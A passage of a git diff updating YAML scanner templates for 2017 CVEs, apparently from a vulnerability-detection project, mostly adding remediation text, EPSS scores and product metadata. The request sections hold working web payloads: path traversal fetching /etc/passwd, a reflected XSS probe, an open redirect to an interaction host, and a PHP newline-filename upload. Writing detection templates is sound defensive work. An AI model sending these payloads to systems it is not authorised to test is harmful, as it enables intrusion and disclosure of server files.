cve2017,dreambox,rce,oast,edb,cve @@ -44,4 +51,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/11 +# digest: 4a0a0047304502201cc3c1d3627d4954f8cbef963b5fc4e3be078a59b7224d5b5a9954180ca7fb1a022100977add17d4dfc1c5358f4136171ebe7ba08317b9d7f10aa06f4c544a5a27b080:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 293ddf21e4..f22290644d 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -6,21 +6,30 @@ info: severity: medium description: | FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below. + remediation: | + Apply the latest security patches or firmware updates provided by Fortinet to mitigate this vulnerability. reference: - https://www.fortiguard.com/psirt/FG-IR-17-242 - https://fortiguard.com/advisory/FG-IR-17-242 - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891 - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 + - http://www.securitytracker.com/id/1039891 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-14186 cwe-id: CWE-79 + epss-score: 0.02948 + epss-percentile: 0.8972 + cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: port:10443 http.favicon.hash:945408572 verified: true + max-request: 1 + vendor: fortinet + product: fortios + shodan-query: port:10443 http.favicon.hash:945408572 tags: cve,cve2017,fortigate,xss,fortinet + http: - method: GET path: @@ -42,4 +51,4 @@ http: status: - 200 -# Enhanced by md on 2023/01/11 +# digest: 4a0a00473045022100bf0a843af5364fc87b91b02eba8c97422078880d5b7a2552b0ebf326450ff8d902202c7a1af65efc85e0afd74d878d369f06a497d101a7b514d24d44925421a03c06:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index fee67e9967..9d88cc415f 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -6,22 +6,29 @@ info: severity: medium description: | OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 + - http://seclists.org/fulldisclosure/2017/Sep/57 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-14524 cwe-id: CWE-601 - tags: cve,cve2017,redirect,opentext,seclists + epss-score: 0.00258 + epss-percentile: 0.63299 + cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: opentext + product: documentum_administrator + tags: cve,cve2017,redirect,opentext,seclists http: - method: GET - path: - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' @@ -31,4 +38,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# Enhanced by md on 2023/03/20 +# digest: 4a0a00473045022100f1eac4d1bcdd65f8fe037bd599aa565038790a840aab9e9b281b3363c314568c0220527e96e369346432fbde6b6971a81fe78568c1a585f5795a00aa9961438e9a40:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 2a23bea903..1e96058408 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -5,21 +5,27 @@ info: author: pikpikcu severity: high description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. + remediation: | + Upgrade to a patched version of Trixbox or apply the necessary security patches provided by the vendor. reference: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t + - https://twitter.com/tiger_tigerboy/status/962689803270500352 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-14535 cwe-id: CWE-78 - cpe: cpe:2.3:a:netfortris:trixbox:*:*:*:*:*:*:*:* - epss-score: 0.04 - tags: cve,cve2017,trixbox,rce,injection,edb + epss-score: 0.04456 + epss-percentile: 0.91465 + cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netfortris + product: trixbox + tags: cve,cve2017,trixbox,rce,injection,edb http: - raw: @@ -34,7 +40,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -43,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/01 +# digest: 4a0a0047304502210082e5cdac05490fa0c2b06cb1616ead3f935668dd3f56201cb7047be2630f9a3f0220049e2ff1ed26ffce816175b49cee669a5b0fa6560b3f47f7dbb76e5ea2cb7cf3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index db7aba4b69..d2549d2acf 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. + remediation: | + Apply the latest security patches or upgrade to a newer version of Trixbox to mitigate this vulnerability. reference: - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 @@ -15,13 +17,15 @@ info: cvss-score: 6.5 cve-id: CVE-2017-14537 cwe-id: CWE-22 - cpe: cpe:2.3:a:netfortris:trixbox:*:*:*:*:*:*:*:* - epss-score: 0.01679 + epss-score: 0.01002 + epss-percentile: 0.81977 + cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: netfortris + product: trixbox tags: cve,cve2017,trixbox,lfi,packetstorm - http: - raw: - | @@ -33,7 +37,6 @@ http: Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages - - | GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1 Host: {{Hostname}} @@ -45,13 +48,13 @@ http: matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body - -# Enhanced by mp on 2022/04/26 +# digest: 4a0a0047304502204b4cfd07b0495356b7787081998614c387cda7e15a2b0b4af9f200d2bdd8266e022100f6b467b38a36bea94eb2b292611d6137273af70234d784e5598b84ef53f2ba24:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 3782c781d6..c193681682 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -6,9 +6,10 @@ info: severity: medium description: | WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks. + remediation: | + Update the WordPress 2kb Amazon Affiliates Store plugin to version 2.1.1 or later to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html - - https://web.archive.org/web/20200227144721/http://www.securityfocus.com/bid/101050 - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622 - https://nvd.nist.gov/vuln/detail/CVE-2017-14622 @@ -17,9 +18,15 @@ info: cvss-score: 6.1 cve-id: CVE-2017-14622 cwe-id: CWE-79 + epss-score: 0.00135 + epss-percentile: 0.48457 + cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: 2kblater + product: 2kb_amazon_affiliates_store + framework: wordpress tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm http: @@ -30,7 +37,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} @@ -46,4 +52,4 @@ http: - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# Enhanced by md on 2023/03/13 +# digest: 490a004630440220479f3cfbc0a22c53a06df0d18cd7fafec1c7c80edfd4d299df00f4add03caef902206912675b2ed9faf73137a2e8822cdc5a3bb0ae4ebe936a946de0b0f635a2f7c2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 34914adde6..fb334ffa13 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -5,6 +5,8 @@ info: author: mass0ma severity: medium description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. + remediation: | + Upgrade to a patched version of WSO2 Data Analytics Server or apply the necessary security patches provided by the vendor. reference: - https://github.com/cybersecurityworks/Disclosed/issues/15 - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265 @@ -15,10 +17,14 @@ info: cvss-score: 4.8 cve-id: CVE-2017-14651 cwe-id: CWE-79 - epss-score: 0.00141 - tags: cve,cve2017,wso2,xss + epss-score: 0.00144 + epss-percentile: 0.50031 + cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wso2 + product: api_manager + tags: cve,cve2017,wso2,xss http: - method: GET @@ -27,17 +33,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - "Failed to add new collection" - part: body condition: and - type: word + part: header words: - "text/html" - part: header -# Enhanced by mp on 2022/04/14 +# digest: 4a0a00473045022100b6c0bedba7cb9655ae9716982c27d04e98c156da2b16b9e83f20bba325c4f9a402201b78cc31ad8044b0527ca18933c309fba2473a1fc27976540bd6befe6ea494b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 688789f24c..089f496f3d 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -5,32 +5,40 @@ info: author: Random_Robbie severity: high description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to ".." handling is incompatible with the pathname validation used by unspecified community modules. + remediation: | + Upgrade Node.js to version 8.6.0 or higher to mitigate the vulnerability. reference: - https://twitter.com/nodejs/status/913131152868876288 - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ - https://nvd.nist.gov/vuln/detail/CVE-2017-14849 - - http://web.archive.org/web/20210423143109/https://www.securityfocus.com/bid/101056 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-14849 cwe-id: CWE-22 - tags: cve,cve2017,nodejs,lfi + epss-score: 0.96872 + epss-percentile: 0.99595 + cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nodejs + product: node.js + tags: cve,cve2017,nodejs,lfi http: - method: GET path: - "{{BaseURL}}/static/../../../a/../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body -# Enhanced by mp on 2022/06/09 +# digest: 4a0a00473045022100fdfcd27d677f6f8640bca5875c341eac31cc155bc8880623d1b711e1ac9645d802202360db981d0aa3f53bbb0c272b45d99ef0c73c4ae709d12eb7ced630b9466941:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 779bc6d2cb..063b32e99b 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI. + remediation: | + Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks. reference: - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf - https://www.exploit-db.com/exploits/42986/ @@ -15,9 +17,15 @@ info: cvss-score: 6.1 cve-id: CVE-2017-15287 cwe-id: CWE-79 - tags: dreambox,edb,cve,cve2017,xss + epss-score: 0.00129 + epss-percentile: 0.47331 + cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 + vendor: bouqueteditor_project + product: bouqueteditor + framework: dreambox + tags: dreambox,edb,cve,cve2017,xss http: - raw: @@ -31,4 +39,4 @@ http: words: - 'Unknown command: ' -# Enhanced by mp on 2022/04/26 +# digest: 4b0a00483046022100a9e3236953c0572e3b76ba44cf0f404c2ebdd7f37aacdf0d506b7427f028d7ac022100fc2f68ee5730f0e20825bb6fb71faaa9d5dde1af9ad2748e1f7855d561a3a74d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index f3459dd97f..81ff545d6b 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter. + remediation: | + Update to the latest version of Restler and TYPO3 to fix the vulnerability. reference: - https://www.exploit-db.com/exploits/42985 - https://extensions.typo3.org/extension/restler/ @@ -15,11 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2017-15363 cwe-id: CWE-22 - cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:*:*:* epss-score: 0.04393 - tags: cve,cve2017,restler,lfi,edb + epss-percentile: 0.91413 + cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* metadata: max-request: 1 + vendor: luracast + product: restler + framework: typo3 + tags: cve,cve2017,restler,lfi,edb http: - method: GET @@ -42,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 +# digest: 490a0046304402200fafbbed53e329aef0dfb1228865400ac07c1949a0c2b5738ab861f492e85c7a022010e1167dc43481dbb68a38080702dafc59539b388a9f1f69fa8c06d15598c20c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 8a8bc3e34c..e8dffa9aa7 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. + remediation: | + Apply the latest firmware update provided by FiberHome to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/44054 - https://blogs.securiteam.com/index.php/archives/3472 @@ -14,9 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2017-15647 cwe-id: CWE-22 - tags: lfi,router,edb,cve,cve2017 + epss-score: 0.02013 + epss-percentile: 0.87637 + cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fiberhome + product: routerfiberhome_firmware + tags: lfi,router,edb,cve,cve2017 http: - method: GET @@ -25,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -34,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 +# digest: 4a0a0047304502206666da323bb264fe9cd883ea934d11bcfc1da9dc9cc9c86b72c576813b9e5660022100acef2731260bb6df592fd39f1b315b28af56b40a9803d00163a5c9a6ac76ca73:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index dd81fff9a4..ffa552f959 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -5,19 +5,27 @@ info: author: geeknik severity: high description: Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in , which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename. + remediation: | + Upgrade Apache httpd to a version higher than 2.4.29 or apply the necessary patches. reference: - https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 - https://httpd.apache.org/security/vulnerabilities_24.html - http://www.openwall.com/lists/oss-security/2018/03/24/6 - https://nvd.nist.gov/vuln/detail/CVE-2017-15715 + - http://www.securitytracker.com/id/1040570 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-15715 cwe-id: CWE-20 - tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive + epss-score: 0.97023 + epss-percentile: 0.9966 + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: http_server + tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive http: - raw: @@ -36,7 +44,6 @@ http: {{randstr}}.php\x0A ------WebKitFormBoundaryKc8fBVDo558U4hbJ-- - - | GET /{{randstr}}.php\x0A HTTP/1.1 Host: {{Hostname}} @@ -49,4 +56,4 @@ http: dsl: - 'contains(body_2, "{{randstr_1}}")' -# Enhanced by mp on 2022/06/09 +# digest: 4a0a00473045022100e6af64817a0e0ae7ca0ee887f2a705ff10b37a45b55b00ede9fda94464095dab02200880cdb1bf0bc0875f13db6695cd41b219af6ca255215513cf7c9bd03cb6eaad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 0214a720bf..4dce396170 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -5,18 +5,26 @@ info: author: emadshanab,milo2012 severity: critical description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. + remediation: | + Apply the latest security patches and updates provided by Palo Alto Networks. reference: - https://www.exploit-db.com/exploits/43342 - https://security.paloaltonetworks.com/CVE-2017-15944 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - https://nvd.nist.gov/vuln/detail/CVE-2017-15944 + - http://www.securitytracker.com/id/1040007 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-15944 - tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect + epss-score: 0.97377 + epss-percentile: 0.99877 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: paloaltonetworks + product: pan-os + tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect http: - raw: @@ -36,4 +44,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/26 +# digest: 4a0a0047304502202d44ef73cc54feaf5c8b79f911348ba0bd44a02402526d0710dd317e59fd2ac20221008c3d1c3aef4a0a84e50cc727aad866c6b3c3d1dcd9465dfb552e121028612056:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 5277118f74..39ae20631d 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs. + remediation: | + Upgrade Ulterius Server to version 1.9.5.0 or later to mitigate the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/43141 - https://nvd.nist.gov/vuln/detail/CVE-2017-16806 @@ -15,9 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2017-16806 cwe-id: CWE-22 - tags: cve2017,ulterius,traversal,edb,cve + epss-score: 0.07105 + epss-percentile: 0.93238 + cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: ulterius + product: ulterius_server + tags: cve2017,ulterius,traversal,edb,cve http: - method: GET @@ -27,15 +34,15 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex + part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - part: body + - type: status + status: + - 200 -# Enhanced by mp on 2022/04/26 +# digest: 4a0a004730450220554b02d111ebad1022c9a6bb13e3e44f9cc6c44219fc53911c16a9d824d516ee022100a73a93cf7e5028a448b7f89e12e91fc2db986d2fbc72d179e2a0e2931e1955ce:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index c529f65951..211426ec30 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information. + remediation: | + Upgrade Nextjs to version 2.4.1 or above to mitigate this vulnerability. reference: - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 - https://github.com/zeit/next.js/releases/tag/2.4.1 @@ -14,9 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2017-16877 cwe-id: CWE-22 - tags: cve,cve2017,nextjs,lfi,traversal + epss-score: 0.0032 + epss-percentile: 0.67236 + cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zeit + product: next.js + tags: cve,cve2017,nextjs,lfi,traversal http: - method: GET @@ -25,15 +32,14 @@ http: matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body condition: and - type: status status: - 200 -# Enhanced by mp on 2022/06/09 +# digest: 4a0a00473045022100a9a4ceefbb9ffbea306ca147a8f8783384d199485f7cc75549085e6f1de3be3e02206ab08f2fe324846209b40af0fde66cd54c910fb1a196c87ac016de402a0609fd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 03e3baec72..91110129f7 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel. + remediation: | + Upgrade Laravel to version 5.5.21 or higher to fix the information disclosure vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16894 - https://packetstormsecurity.com/files/cve/CVE-2017-16894 @@ -17,11 +19,16 @@ info: cvss-score: 7.5 cve-id: CVE-2017-16894 cwe-id: CWE-200 + epss-score: 0.29151 + epss-percentile: 0.96355 + cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="Laravel-Framework" - shodan-query: Laravel-Framework verified: true + max-request: 1 + vendor: laravel + product: laravel + shodan-query: Laravel-Framework + fofa-query: app="Laravel-Framework" tags: cve2017,laravel,exposure,packetstorm,cve http: @@ -48,4 +55,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/20 +# digest: 4a0a004730450220451f1cfb9b783e65e0456d79eaed7fa3b6dff913933b285ebbc3d1fc678d61600221008cc00a9e5babca72ed389ea837e5b5250e5cfc1aeca56a5b464a92dbb04b48f4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 4b29ab7a5c..d8c2df3bab 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Emag Marketplace Connector plugin 1.0 contains a reflected cross-site scripting vulnerability because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. + remediation: | + Update to the latest version of the WordPress Emag Marketplace Connector plugin (1.1) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wordpress.org/support/topic/wordpress-emag-marketplace-connector-1-0-cross-site-scripting-vulnerability/ - https://packetstormsecurity.com/files/145060/wpemagmc10-xss.txt @@ -15,9 +17,15 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17043 cwe-id: CWE-79 - tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress + epss-score: 0.00245 + epss-percentile: 0.6227 + cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: zitec + product: emag_marketplace_connector + framework: wordpress + tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress http: - method: GET @@ -27,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402200513311e4544c269cfac986f325bd4bd7352005df48d984fcf76ddb4bbaa9823022044b014d61eb72331bd1a6617053e014d932432f4bc1e0d7b48ef99233a71e7fd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 3c555a1287..6abd8d1ba8 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php. + remediation: | + Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor. reference: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html @@ -14,9 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17059 cwe-id: CWE-79 - tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress + epss-score: 0.00261 + epss-percentile: 0.63604 + cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: amtythumb_project + product: amtythumb + framework: wordpress + tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress http: - method: POST @@ -28,9 +36,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a004830460221009331e6167bdd740c142bfbf4c7ba19be8620e712bc36d8e7aa31b310af72a9da022100df92e355646d9fa594454cc92b9fcbfc2f5fc319ce45b1225d1b3d2105e4d0e7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 89f5659046..4fb84442b1 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ 